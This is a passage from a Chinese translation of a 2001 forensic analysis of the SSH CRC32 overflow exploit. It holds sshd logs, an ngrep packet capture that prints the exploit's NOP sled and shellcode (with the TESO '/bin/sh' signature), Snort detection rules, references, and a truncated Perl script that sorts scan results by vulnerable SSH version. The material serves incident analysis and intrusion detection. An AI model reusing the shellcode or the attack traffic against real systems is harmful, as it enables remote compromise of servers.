Nov 1 18:48:17 victim sshd[9612]: log: Connection from 10.10.10.10 port 33399
Nov 1 18:48:18 victim sshd[9613]: log: Connection from 10.10.10.10 port 33400
Nov 1 18:48:18 victim sshd[9614]: log: Connection from 10.10.10.10 port 33401
Nov 1 18:58:18 victim sshd[9614]: fatal: Timeout before authentication.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
注意日志條目的最一條,如果成功利用此漏洞被入侵,認証過程就會停止,因為
此時SHELLCODE的門程序已經執行,這樣你可以連接端口進行任何操作。唯一的
問題是,SSH守護程序(至少SSH.com 1.2.31)會由認証過程不完整而超時,導致
關閉開啟的SHELL。一般在監聽shell的父進程關閉只前會有10分鐘時間空域。
網絡通信信息分析
=====================
在這裡使用了Tcpdump來截獲上面的攻擊行為,記錄信息在sshdx.dump,可以被用
來IDS入侵檢測系統獲得攻擊標志信息。如果你的IDS系統不支持tcpdump文件,你
可以使用"tcpreplay"[12]來轉換tcpdump信息。
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# tcpdump -s1500 -w sshdx.dump ip host 10.10.10.3 &
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
這樣可以很容易的查看SSH守護程序產生的多個連接信息,使用"ngrep"[5]工具可以
辨認出最連接和插入SHELLCODE的暴力破解攻擊信息:
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
. . .
T 10.10.10.3:2222 -> 10.10.10.10:32957 [AP]
SSH-1.5-1.2.31.
T 10.10.10.10:32957 -> 10.10.10.3:2222 [AP]
SSH-1.5-OpenSSH_2.2.0p1.
T 10.10.10.3:2222 -> 10.10.10.10:32957 [AP]
............GA..@.......%....`..P.....D&..2.+7#...1!?..c.r).8.^.h.....
..I..b6..9.f........N..0....:BAh@s.e...H......(.D2.Zg......#.......\.j
W...O$....6.......$...V..;...U.@Y.K2.p<\..o..?..l.........*.p.K<s..,..
.@7.wBBy......1.i..%".....G*g.G.t(......M........[.......J......<.
T 10.10.10.10:32957 -> 10.10.10.3:2222 [AP]
............GA..@.....`G.Fg.g.!.i.}..........._.e....=../..6....;....)
T.....|c...#W.\wve.cy .n.....q.Sc....}..".N.G.w"....n.../#.....8x..&.Z
....Q/.......8..
T 10.10.10.3:2222 -> 10.10.10.10:32957 [AP]
.........4..
T 10.10.10.10:32957 -> 10.10.10.3:2222 [A]
..W...2.......2.......2.......2.......2.......2.......2.......2.......
2.......2.......2.......2.......2.......2.......2.......2.......2 ....
..2!......2$......2%......2(......2)......2,......2-......20......21..
....24......25......28......29......2<......2=......2@......2A......2D
......2E......2H......2I......2L......2M......2P......2Q......2T......
2U......2X......2Y......2\......2]......2`......2a......2d......2e....
..2h......2i......2l......2m......2p......2q......2t......2u......2x..
....2y......2|......2}......2.......2.......2.......2.......2.......2.
......2.......2.......2.......2.......2.......2.......2.......2.......
2.......2.......2.......2.......2.......2.......2.......2.......2.....
..2.......2.......2.......2.......2.......2.......2.......2.......2...
....2.......2.......2.......2.......2.......2.......2.......2.......2.
......2.......2.......2.......2.......2.......2.......2.......2.......
2.......2.......2.......2.......2.......2.......2.......2.......2.....
..2.......2.......2.......2.......2.......2.......3.......3.......3...
....3.......3.......3.......3.......3.......3.......3.......3.......3.
......3.......3.......3.......3.......3 ......3!......3$......3%......
3(......3)......3,......3-......30......31......34......35......38....
..39......3<......3=......3@......3A......3D......3E......3H......3I..
....3L......3M......3P......3Q......3T......3U......3X......3Y......3\
......3]......3`......3a......3d........1...p}.@
T 10.10.10.10:32957 -> 10.10.10.3:2222 [A]
......3i......3l......3m......3p......3q......3t......3u......3x......
3y......3|......3}......3.......3.......3.......3.......3.......3.....
..3.......3.......3.......3.......3.......3.......3.......3.......3...
....3.......3.......3.......3.......3.......3.......3.......3.......3.
......3.......3.......3.......3.......3.......3.......3.......3.......
3.......3.......3.......3.......3.......3.......3.......3.......3.....
..3.......3.......3.......3.......3.......3.......3.......3.......3...
....3.......3.......3.......3.......3.......3.......3.......3.......3.
......3.......3.......3.......3.......3.......4.......4.......4.......
4.......4.......4.......4.......4.......4.......4.......4.......4.....
..4.......4.......4.......4.......4 ......4!......4$......4%......4(..
....4)......4,......4-......40......41......44......45......48......49
......4<......4=......4@......4A......4D......4E......4H......4I......
4L......4M......4P......4Q......4T......4U......4X......4Y......4\....
..4]......4`......4a......4d......4e......4h......4i......4l......4m..
....4p......4q......4t......4u......4x......4y......4|......4}......4.
......4.......4.......4.......4.......4.......4.......4.......4.......
4.......4.......4.......4.......4.......4.......4.......4.......4.....
..4.......4.......4.......4.......4.......4.......4.......4.......4...
....4.......4.......4.......4.......4.......4.......4.......4.......4.
......4.......4.......4.......4.........1...p}.@
. . .
T 10.10.10.10:32957 -> 10.10.10.3:2222 [A]
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
.....................1..f..1...C.].C.].K.M..M...1..E.Cf.].f.E.09.M..E.
.E..E.....M.....CC....C....1..?......A....^.u.1..F..E......M..U.......
./bin/sh.h0h0h0, 7350, zip/TESO!......................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
........................................1...p}.@
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
這樣針對這個攻擊程序你可以匹配如下字符串"h0h0h0, 7350, zip/TESO!" [7] 和NOP等。
下面的特征字符串由Marty Roesch 和 Brian Caswell開發並可使用在Snort v1.8 或者
更高的版本[6]:
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
alert tcp $EXTERNAL_NET any -> $HOME_NET 22 \
(msg:"EXPLOIT ssh CRC32 overflow /bin/sh"; \
flags:A+; content:"/bin/sh"; \
reference:bugtraq,2347; reference:cve,CVE-2001-0144; \
classtype:shellcode-detect;)
alert tcp $EXTERNAL_NET any -> $HOME_NET 22 \
(msg:"EXPLOIT ssh CRC32 overflow filler"; \
flags:A+; content:"|00 00 00 00 00 00 00 00 00 00 00 00 00|"; \
reference:bugtraq,2347; reference:cve,CVE-2001-0144; \
classtype:shellcode-detect;)
alert tcp $EXTERNAL_NET any -> $HOME_NET 22 \
(msg:"EXPLOIT ssh CRC32 overflow NOOP"; \
flags:A+; content:"|90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90|"; \
reference:bugtraq,2347; reference:cve,CVE-2001-0144; \
classtype:shellcode-detect;)
alert tcp $EXTERNAL_NET any -> $HOME_NET 22 \
(msg:"EXPLOIT ssh CRC32 overflow"; \
flags:A+; content:"|00 01 57 00 00 00 18|"; offset:0; depth:7; \
content:"|FF FF FF FF 00 00|"; offset:8; depth:14; \
reference:bugtraq,2347; reference:cve,CVE-2001-0144; \
classtype:shellcode-detect;)
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
鑒別你的主機是否存在此漏洞
===========================
你可以使用Jeremy Mates' scan_ssh.pl[8] 和 Niels Provos' ScanSSH scanner[9]
寫的腳本來鑒別SSH服務和它們的版本。
Russell Fulton 也公布了一個腳本程序Argus[10]用來處理日志,包含在下面的附錄中。
----------------------------------------------------------------------------
參考
========
[1] Portable Linux Amazing CD (PLAC) v2.9.1pre2, by Fred Cohen
http://www.all.net/ForensiX/plac.html
[2] Netcat, by der Hobbit
http://www.l0pht.com/~weld/netcat/
[3] Reverse Engineer's Query Tool
http://packetstormsecurity.org/linux/reverse-engineering/reqt-0.7f.tar.gz
[4] LiSt Open Files (lsof)
http://sunsite.securitycentralhq.com/mirrors/security/lsof/lsof.tar.gz
[5] ngrep, by Jordan Ritter
http://www.packetfactory.net/projects/ngrep/
[6] Snort
http://www.snort.org/
[7] 7350.org / 7350
http://www.7350.org/
http://www.team-teso.org/about.php (see the bottom)
[8] Jeremy Mates 提供的ssh_scan.pl
http://sial.org/code/perl/scripts/ssh_scan.pl.html
[9] Niels Provos提供的ScanSSH 掃描程序
http://www.monkey.org/~provos/scanssh/
[10] Argus - 網絡傳輸審核工具
http://www.pl.freebsd.org/es/ports/net.html#argus-1.8.1
[11] tcpdump
http://staff.washington.edu/dittrich/misc/sshdx.dump
[12] tcpreplay
http://packages.debian.org/testing/net/tcpreplay.html
Appendix A
==========
兩個掃描腳本如下
=-=-=-=-=-=-=-=-=-=-=-=-=-=- cut here -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
#!/usr/bin/perl
#
# ssh-report
#
# Dave Dittrich <dittrich@cac.washington.edu>
# Thu Nov 8 21:39:20 PST 2001
#
# Process output of scans for SSH servers, with version identifying
# information, into two level break report format by SSH version.
#
# This script operates on a list of scan results that look
# like this:
#
# % cat scanresults
# 10.0.0.1 beavertail.dept.foo.edu SSH-1.5-1.2.31
# 10.0.0.2 lumpysoup.dept.foo.edu SSH-1.5-1.2.31
# 10.0.0.3 marktwain.dept.foo.edu SSH-1.99-OpenSSH_2.5.2p2
# 10.0.0.4 junebug.dept.foo.edu SSH-1.5-1.2.31
# 10.0.0.10 calvin.dept.foo.edu SSH-1.99-OpenSSH_2.5.2p2
# 10.0.0.11 hobbes.dept.foo.edu SSH-1.99-OpenSSH_2.1.1
# 10.0.0.20 willow.dept.foo.edu SSH-1.99-OpenSSH_2.9p2
# 10.0.0.21 berry.dept.foo.edu SSH-1.99-OpenSSH_2.9p2
# 10.0.0.23 whimpy.dept.foo.edu SSH-1.99-OpenSSH_2.9p2
#
# The resulting report (without the "-a" flag) will look like this:
#
# % ssh-report < scanresults
#
# SSH-1.5-1.2.31 (affected)
# beavertail.dept.foo.edu(10.0.0.1)
# lumpysoup.dept.foo.edu(10.0.0.2)
# junebug.dept.foo.edu(10.0.0.4)
#
#
# SSH-1.99-OpenSSH_2.1.1 (affected)
# hobbes.dept.foo.edu(10.0.0.11)
#
# By default, this script will only report on those systems that
# are running potentially vulnerable SSH servers. Use the "-a"
# option to report on all servers. Use "grep -v" to filter out
# hosts *before* you run them through this reporting script.
#
# SSH servers are considered "affected" if they are known, by being
# listed in one or more of the following references, to have the crc32
# compensation attack detector vulnerability:
#
# http://www.kb.cert.org/vuls/id/945216
# http://www.securityfocus.com/bid/2347/
# http://xforce.iss.net/alerts/advise100.php
# http://www.ssh.com/products/ssh/advisories/ssh1_crc-32.cfm
#
# You also may need to adjust the logic below to lump systems
# into the "Unknown" category correctly (e.g., if your server
# has a custom version string, access control, etc.)
#
# The list below of servers and potential vulnerability was derived by
# summarizing existing versions on a set of production networks and
# using the advisories and reference material listed above. You
# should update this list as new information is obtained, or if new
# versions of the SSH server are found on your network.
%affected = (
'Unknown', 'unknown',
'SSH-1.4-1.2.14', 'not affected',
'SSH-1.4-1.2.15', 'not affected',
'SSH-1.4-1.2.16', 'no
(http://www.fanqiang.com)
進入【UNIX論壇】
|
|
| 相關文章 |
SSH使用及協議分析 (2002-08-02 06:02:00)
OpenSSH缺陷允許攻擊者遠程利用/非法執行任意代碼 (2002-07-05 06:02:00)
如何使用SSH的Port Forwarding加密不安全的服務 (2001-09-12 12:00:00)
SSH使用及協議分析 (2001-09-12 07:00:01)
遠程連接(telnet/ftp/rsh/ssh)作為root的用法和總結 (2001-09-02 13:05:00)
安裝配置SSH(Secure Shell) (2001-06-25 17:04:00)
SSH protocol 1.5 會話密鑰可被恢復 (2001-05-21 10:08:01)
如何在 Linux 上安裝、使用 SSH2 (2001-05-10 20:28:41)
How to Run SSH2 on RedHat 6.2 (2001-04-21 18:05:54)
Linux系統中OpenSSH的安裝和配置 (2001-04-19 16:14:25)
|
|
|
|
|
★ 樊強制作 歡迎分享 ★ |